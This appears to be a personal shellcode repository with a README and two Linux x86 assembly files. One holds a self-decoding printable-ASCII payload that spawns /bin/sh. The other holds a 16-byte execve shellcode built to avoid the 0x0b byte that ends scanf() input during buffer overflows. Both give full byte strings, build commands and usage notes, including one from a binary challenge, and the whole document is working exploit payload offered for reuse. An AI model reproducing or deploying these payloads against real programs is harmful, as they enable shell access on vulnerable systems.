├── README.md
├── linux_x86_alphanumeric_edx_offset_binsh_shellcode.asm
└── linux_x86_execve_no_whitespace.asm

/README.md:
--------------------------------------------------------------------------------
1 | # Shellcodes
2 | I'll post the custom shellcode I write here!
3 |
--------------------------------------------------------------------------------
/linux_x86_alphanumeric_edx_offset_binsh_shellcode.asm:
--------------------------------------------------------------------------------
1 | ;Stub decoder -- self-modifying: every `sub byte [edx + off], bl` below rewrites one byte of the payload in place through EDX, so the memory the shellcode sits in must be writable as well as executable (a W^X / NX-protected page faults on the first sub); an offset listed twice (0x3d, 0x3f, 0x48) is decoded twice, i.e. 2*0x69 is subtracted.
2 | ;| 0x08000110 6a69 push 0x69 ; 'i' ; 105 ; [01] -r-x section size 48 named .text
3 | ;| 0x08000112 5b pop ebx
4 | ;| 0x08000113 285a31 sub byte [edx + 0x31], bl
5 | ;| 0x08000116 285a3d sub byte [edx + 0x3d], bl
6 | ;| 0x08000119 285a3d sub byte [edx + 0x3d], bl
7 | ;| 0x0800011c 285a3e sub byte [edx + 0x3e], bl
8 | ;| 0x0800011f 285a3f sub byte [edx + 0x3f], bl
9 | ;| 0x08000122 285a3f sub byte [edx + 0x3f], bl
10 | ;| 0x08000125 285a41 sub byte [edx + 0x41], bl
11 | ;| 0x08000128 285a42 sub byte [edx + 0x42], bl
12 | ;| 0x0800012b 285a43 sub byte [edx + 0x43], bl
13 | ;| 0x0800012e 285a44 sub byte [edx + 0x44], bl
14 | ;| 0x08000131 285a45 sub byte [edx + 0x45], bl
15 | ;| 0x08000134 285a46 sub byte [edx + 0x46], bl
16 | ;| 0x08000137 285a47 sub byte [edx + 0x47], bl
17 | ;| 0x0800013a 285a48 sub byte [edx + 0x48], bl
18 | ;\ 0x0800013d 285a48 sub byte [edx + 0x48], bl
19 |
20 | ;Spawn /bin/sh (this is the decoded payload, bytes 48..72; the 0x00 bytes of `mov eax, 0xb` only exist after decoding, so the encoded form is NUL-free):
21 | ;| 0x08000110 31c0 xor eax, eax ; [01] -r-x section size 25 named .text
22 | ;| 0x08000112 50 push eax
23 | ;| 0x08000113 682f2f7368 push 0x68732f2f ; '//sh'
24 | ;| 0x08000118 682f62696e push 0x6e69622f ; '/bin'
25 | ;| 0x0800011d 89e3 mov ebx, esp
26 | ;| 0x0800011f 99 cdq
27 | ;| 0x08000120 31c9 xor ecx, ecx
28 | ;| 0x08000122 b80b000000 mov eax, 0xb ; 11
29 | ;\ 0x08000127 cd80 int 0x80
30 |
31 | ; This shellcode requires EDX to be set to the address of the first byte of the shellcode. Note that the encoding is printable ASCII rather than strictly alphanumeric: besides letters and digits it uses '[', '(', ')', '=', '>', '?', '/' and '!', so check those against the target's bad-byte list too.
32 | ; in this shellcode the first byte is 0x6a.
; I created this shellcode for a binary challenge I was doing recently.
; In that challenge I was able to get EDX to point at the first byte of my shellcode and execute from EDX.
; This shellcode decodes part of itself and spawns /bin/sh
;
; How it works (see the disassembly above):
;   bytes 0..47  = decoder: `push 0x69` / `pop ebx` (bl = 0x69), then 15 x `sub byte [edx + disp8], bl`
;   bytes 48..72 = execve("/bin//sh", NULL, NULL) payload; every byte that is not printable
;                  is stored as (byte + 0x69) and one `sub` restores it in place. The disp8
;                  values 0x31..0x48 address payload bytes 49..72; an offset that appears
;                  twice in the stub (0x3d, 0x3f, 0x48) gets 2*0x69 subtracted, e.g.
;                  0x5b - 2*0x69 = 0x89, the first byte of `mov ebx, esp`.
;   The 0x00 bytes of `mov eax, 0xb` only exist after decoding (0x69 - 0x69), so the encoded
;   form below is NUL-free.
; Requirements / caveats:
;   - EDX must hold the address of byte 0 (the 0x6a) when execution starts there.
;   - The decoder writes through EDX into its own bytes, so that memory must be writable as
;     well as executable; a read-only/NX-protected page faults on the first `sub`.
;   - The encoding is printable ASCII, not strictly alphanumeric: '[', '(', ')', '=', '>',
;     '?', '/' and '!' are used as well as letters and digits.
; Shellcode: sc = ("\x6a\x69\x5b\x28\x5a\x31\x28\x5a\x3d\x28\x5a\x3d\x28\x5a\x3e\x28\x5a\x3f\x28\x5a\x3f\x28\x5a\x41\x28\x5a\x42\x28\x5a\x43\x28\x5a\x44\x28\x5a\x45\x28\x5a\x46\x28\x5a\x47\x28\x5a\x48\x28\x5a\x48\x31\x29\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x5b\x4c\x6b\x31\x32\x21\x74\x69\x69\x69\x36\x52")
; Length: 73 bytes
global _start
section .text
_start:
    ; Encoded bytes emitted verbatim. `nasm -f elf32` + `ld` gives a test binary, but the
    ; result only works when control reaches _start with EDX == address of _start (see above);
    ; run from a plain ELF entry point EDX is not set up and the decoder writes elsewhere.
    db 0x6a,0x69,0x5b,0x28,0x5a,0x31,0x28,0x5a,0x3d,0x28,0x5a,0x3d,0x28,0x5a,0x3e,0x28,0x5a,0x3f,0x28,0x5a,0x3f,0x28,0x5a,0x41,0x28,0x5a,0x42,0x28,0x5a,0x43,0x28,0x5a,0x44,0x28,0x5a,0x45,0x28,0x5a,0x46,0x28,0x5a,0x47,0x28,0x5a,0x48,0x28,0x5a,0x48,0x31,0x29,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x5b,0x4c,0x6b,0x31,0x32,0x21,0x74,0x69,0x69,0x69,0x36,0x52

--------------------------------------------------------------------------------
/linux_x86_execve_no_whitespace.asm:
--------------------------------------------------------------------------------
; To create the binary
; nasm -f elf32 linux_x86_execve_no_whitespace.asm -o sc.o
; ld sc.o -o sc

; Use objdump or some other tool to extract shellcode from sc binary!

; 'e' execve shellcode by @Pink_P4nther.
; The point of this shellcode is to bypass when 0x0b (11) is a bad byte.
; This helped when giving overflow input to scanf() for example.
; scanf() sees 0x0b as white space therefore ending the read from STDIN.
; I also made it as small as possible so the executable name is now 'e'
; make sure to create a link to whatever you want to execute and name the link 'e'
; For example: `ln -s /bin/sh e` <- For a shell
; 16 bytes.
;
; Net effect: execve("e", NULL, NULL) via int 0x80 (eax = 11, ebx -> "e\0", ecx = edx = 0).
; Caveats:
;   - "e" is a relative path, resolved against the *target process's* current working
;     directory, so the `e` link must exist there, not merely in the attacker's shell.
;   - argv and envp are both NULL; Linux accepts this, but confirm against the target
;     kernel/sandbox before relying on it -- some seccomp/ptrace policies are stricter.
;   - Encoding 31 c0 50 6a 65 89 e3 99 31 c9 04 0e 2c 03 cd 80 contains no NUL and no byte in
;     0x09-0x0d or 0x20 (C-locale whitespace), which is what keeps a scanf() read from
;     stopping early.

; sc = ("\x31\xc0\x50\x6a\x65\x89\xe3\x99\x31\xc9\x04\x0e\x2c\x03\xcd\x80")

section .text

global _start

_start:
    xor eax,eax     ; Zero eax
    push eax        ; Put 0 on the stack (NUL terminator for the "e" path string)
    push 0x65       ; Put 'e' on the stack (push imm8 sign-extends to a dword: "e\0\0\0")
    mov ebx,esp     ; Move address of 'e' into ebx (execve filename argument)
    cdq             ; Zero edx (sign-extend of eax == 0) -> envp = NULL
    xor ecx,ecx     ; Zero ecx -> argv = NULL
    add al,0xe      ; Add 14 to eax
    sub al,0x3      ; Subtract 3 from eax to put 0xb (11) in eax = __NR_execve, without emitting a 0x0b byte
    int 0x80        ; Software interrupt for system call

--------------------------------------------------------------------------------